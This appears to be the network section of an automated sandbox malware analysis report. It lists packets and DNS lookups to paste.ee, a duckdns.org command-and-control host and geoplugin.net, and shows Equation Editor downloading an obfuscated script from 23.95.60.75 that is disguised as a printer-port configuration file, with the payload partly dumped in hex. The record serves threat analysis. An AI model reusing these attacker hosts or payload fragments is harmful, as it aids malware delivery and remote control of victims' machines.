Apr 20, 2024 11:36:13.058988094 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059001923 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059026957 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059041023 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059065104 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059077978 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059103966 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059118032 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059142113 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059155941 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059180975 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059187889 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059220076 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059233904 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059258938 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059274912 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059298038 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059314013 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059335947 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059353113 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059374094 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059405088 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059415102 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059423923 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059454918 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059469938 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059492111 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059505939 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059531927 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059544086 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059570074 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059585094 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059611082 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.059626102 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.059701920 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.212979078 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213044882 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213052988 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213087082 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213108063 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213130951 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213139057 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213175058 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213181973 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213215113 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213223934 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213257074 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213268042 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213295937 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213318110 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213335991 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213342905 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213376045 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213387012 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213414907 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213438034 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213454008 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213473082 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213493109 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213500977 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213531971 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213545084 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213574886 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213588953 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213613033 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213628054 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213649988 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213650942 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213690996 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213699102 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213727951 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213759899 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213768005 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213787079 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213807106 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213814020 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213845015 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213859081 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213884115 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213896990 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213922977 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213933945 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.213962078 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.213974953 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214000940 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214015007 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214040995 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214056969 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214080095 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214092970 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214118958 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214134932 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214158058 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214164019 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214195967 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214216948 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214236021 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214241982 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214273930 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214279890 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214317083 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214327097 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214354992 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214370012 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214394093 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214412928 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214433908 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214442968 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214472055 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214483976 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214510918 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214521885 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214549065 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214561939 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214590073 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214598894 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214629889 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214638948 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214668036 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214684010 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214708090 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:13.214716911 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.214786053 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.457564116 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:13.719695091 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:14.065990925 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:14.066075087 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:14.073894024 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:14.427118063 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:14.635742903 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:14.983267069 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:14.987535954 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:15.383816957 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:15.383891106 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:15.794255018 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:15.802952051 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:15.805213928 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:16.154406071 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:16.382981062 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:16.743290901 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:36:16.953644037 CEST	80	49167	178.237.33.50	192.168.2.22
Apr 20, 2024 11:36:16.953718901 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:36:16.959551096 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:36:17.177058935 CEST	80	49167	178.237.33.50	192.168.2.22
Apr 20, 2024 11:36:17.177159071 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:36:17.238786936 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:17.650387049 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:18.177054882 CEST	80	49167	178.237.33.50	192.168.2.22
Apr 20, 2024 11:36:18.177167892 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:36:39.092562914 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:36:39.094939947 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:36:39.493777990 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:37:09.131290913 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:37:09.133059978 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:37:09.540920019 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:37:38.564805031 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:37:39.126117945 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:37:39.169222116 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:37:39.173069954 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:37:39.583916903 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:37:40.217994928 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:37:42.375749111 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:37:46.723254919 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:37:55.369431019 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:38:09.220455885 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:38:09.222054005 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:38:09.631002903 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:38:12.713056087 CEST	49167	80	192.168.2.22	178.237.33.50
Apr 20, 2024 11:38:39.245028019 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:38:39.247447968 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:38:39.647125959 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:39:09.289638042 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:39:09.291378021 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:39:09.693433046 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:39:39.337198019 CEST	14645	49166	194.187.251.115	192.168.2.22
Apr 20, 2024 11:39:39.338793993 CEST	49166	14645	192.168.2.22	194.187.251.115
Apr 20, 2024 11:39:39.740892887 CEST	14645	49166	194.187.251.115	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 11:35:59.560256958 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:35:59.668201923 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 20, 2024 11:35:59.684036016 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:35:59.791451931 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 20, 2024 11:36:03.099343061 CEST	52917	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:36:03.207611084 CEST	53	52917	8.8.8.8	192.168.2.22
Apr 20, 2024 11:36:13.578910112 CEST	62751	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:36:13.714725018 CEST	53	62751	8.8.8.8	192.168.2.22
Apr 20, 2024 11:36:16.202132940 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:36:16.308979988 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 20, 2024 11:36:16.310691118 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:36:16.415505886 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 20, 2024 11:36:16.415795088 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:36:16.520716906 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 20, 2024 11:36:16.520971060 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:36:16.628602982 CEST	53	57893	8.8.8.8	192.168.2.22
Apr 20, 2024 11:36:16.630970001 CEST	57893	53	192.168.2.22	8.8.8.8
Apr 20, 2024 11:36:16.737896919 CEST	53	57893	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 20, 2024 11:35:59.560256958 CEST	192.168.2.22	8.8.8.8	0x7709	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:35:59.684036016 CEST	192.168.2.22	8.8.8.8	0x7709	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:03.099343061 CEST	192.168.2.22	8.8.8.8	0xa961	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:13.578910112 CEST	192.168.2.22	8.8.8.8	0xd13a	Standard query (0)	sembe.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.202132940 CEST	192.168.2.22	8.8.8.8	0x51f9	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.310691118 CEST	192.168.2.22	8.8.8.8	0x51f9	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.415795088 CEST	192.168.2.22	8.8.8.8	0x51f9	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.520971060 CEST	192.168.2.22	8.8.8.8	0x51f9	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.630970001 CEST	192.168.2.22	8.8.8.8	0x51f9	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 20, 2024 11:35:59.668201923 CEST	8.8.8.8	192.168.2.22	0x7709	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:35:59.668201923 CEST	8.8.8.8	192.168.2.22	0x7709	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:35:59.791451931 CEST	8.8.8.8	192.168.2.22	0x7709	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:35:59.791451931 CEST	8.8.8.8	192.168.2.22	0x7709	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:03.207611084 CEST	8.8.8.8	192.168.2.22	0xa961	No error (0)	uploaddeimagens.com.br	172.67.215.45	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:03.207611084 CEST	8.8.8.8	192.168.2.22	0xa961	No error (0)	uploaddeimagens.com.br	104.21.45.138	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:13.714725018 CEST	8.8.8.8	192.168.2.22	0xd13a	No error (0)	sembe.duckdns.org	194.187.251.115	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.308979988 CEST	8.8.8.8	192.168.2.22	0x51f9	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.415505886 CEST	8.8.8.8	192.168.2.22	0x51f9	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.520716906 CEST	8.8.8.8	192.168.2.22	0x51f9	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.628602982 CEST	8.8.8.8	192.168.2.22	0x51f9	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false
Apr 20, 2024 11:36:16.737896919 CEST	8.8.8.8	192.168.2.22	0x51f9	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

23.95.60.75

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	23.95.60.75	80	1732	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 11:35:58.482812881 CEST	326	OUT	GET /xampp/htm/IEnetworkings.html HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 23.95.60.75 Connection: Keep-Alive
Apr 20, 2024 11:35:58.637557030 CEST	1289	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 09:35:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 19 Apr 2024 05:58:07 GMT ETag: "1bd66-6166cc5971753" Accept-Ranges: bytes Content-Length: 114022 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Data Raw: ff fe 0d 00 0a 00 27 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 62 00 72 00 6f 00 73 00 69 00 6d 00 6f 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 41 00 63 00 74 00 69 00 6f 00 6e 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 41 00 63 00 74 00 69 00 6f 00 6e 00 4c 00 69 00 73 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 32 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 62 00 72 00 65 00 6e 00 73 00 65 00 64 00 61 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 33 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 61 00 72 00 61 00 76 00 69 00 61 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 34 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6d 00 6f 00 72 00 69 00 62 00 75 00 6e 00 64 00 6f 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 35 00 0d 00 0a 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 76 00 69 00 6c 00 69 00 61 00 73 00 74 00 72 00 6f 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4b 00 45 00 72 00 72 00 6f 00 72 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 0d 00 0a 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 46 00 6c 00 61 00 67 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 72 00 55 00 70 00 64 00 61 00 74 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 61 00 67 00 75 00 73 00 74 00 69 00 6e 00 61 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 72 00 6f 00 6f 00 74 00 5c 00 63 00 69 00 6d 00 76 00 32 00 22 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 43 00 6f 00 6e 00 73 00 74 00 61 00 6e 00 74 00 73 00 20 00 66 00 6f 00 72 00 20 00 74 00 68 00 65 00 20 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 20 00 64 00 69 00 63 00 74 00 69 00 6f 00 6e 00 61 00 72 00 79 00 0d 00 0a 00 27 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 61 00 64 00 69 00 6e 00 61 00 6d 00 69 00 61 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 73 00 75 00 78 00 6f 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 32 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 44 00 6f 00 75 00 62 00 6c 00 65 00 53 00 70 00 6f 00 6f 00 6c 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 33 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 50 00 6f 00 72 00 74 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 34 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 50 00 6f 00 72 00 74 00 54 00 79 00 70 00 65 00 20 00 20 00 20 00 20 Data Ascii: 'const brosimo = 0const kActionDelete = 1const kActionList = 2const brenseda = 3const aravia = 4const moribundo = 5const viliastro = 0const KErrorFailure = 1const kFlagCreateOrUpdate = 0const agustina = "root\cimv2"'' Constants for the parameter dictionary'const adinamia = 1const suxo = 2const kDoubleSpool = 3const kPortNumber = 4const kPortType
Apr 20, 2024 11:35:58.637645006 CEST	1289	IN	Data Raw: 00 20 00 20 00 20 00 20 00 3d 00 20 00 35 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 48 00 6f 00 73 00 74 00 41 00 64 00 64 00 72 00 65 00 73 00 73 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 36 00 0d 00 0a 00 63 00 6f 00 6e 00 73 Data Ascii: = 5const kHostAddress = 6const kSNMPDeviceIndex = 7const kCommunityName = 8const kSNMP = 9
Apr 20, 2024 11:35:58.637685061 CEST	1289	IN	Data Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 4f 00 70 00 65 00 72 00 61 00 e7 00 e3 00 6f 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 50 00 72 00 6f 00 76 00 69 00 64 00 Data Ascii: = "Operao"const L_Provider_Text = "Provedor"const L_Description_Text = "Descri
Apr 20, 2024 11:35:58.637722969 CEST	1289	IN	Data Raw: 00 61 00 70 00 6f 00 64 00 69 00 6f 00 78 00 65 00 20 00 20 00 20 00 3d 00 20 00 22 00 2d 00 67 00 20 00 20 00 20 00 20 00 20 00 2d 00 20 00 6f 00 62 00 74 00 65 00 72 00 20 00 63 00 6f 00 6e 00 66 00 69 00 67 00 75 00 72 00 61 00 e7 00 e3 00 6f Data Ascii: apodioxe = "-g - obter configurao para uma porta TCP"const picroaconitina = "-h - endereo IP do disposit
Apr 20, 2024 11:35:58.637759924 CEST	1289	IN	Data Raw: 6d 00 65 00 20 00 64 00 6f 00 20 00 73 00 65 00 72 00 76 00 69 00 64 00 6f 00 72 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 63 00 68 00 69 00 72 00 61 00 74 00 61 00 20 00 20 00 20 00 3d 00 20 00 22 00 2d 00 74 00 20 00 20 00 20 00 Data Ascii: me do servidor"const chirata = "-t - definir configurao para uma porta TCP"const clave = "-u - nome do u
Apr 20, 2024 11:35:58.637797117 CEST	1289	IN	Data Raw: 00 20 00 2d 00 74 00 20 00 2d 00 73 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 20 00 2d 00 72 00 20 00 49 00 50 00 5f 00 31 00 2e 00 32 00 2e 00 33 00 2e 00 34 00 20 00 2d 00 6d 00 65 00 20 00 2d 00 79 00 20 00 70 00 75 00 62 00 6c 00 69 00 63 Data Ascii: -t -s server -r IP_1.2.3.4 -me -y public -i 1 -n 9100"const descorar = "prnport -g -s server -r IP_1.2.3.4"const L
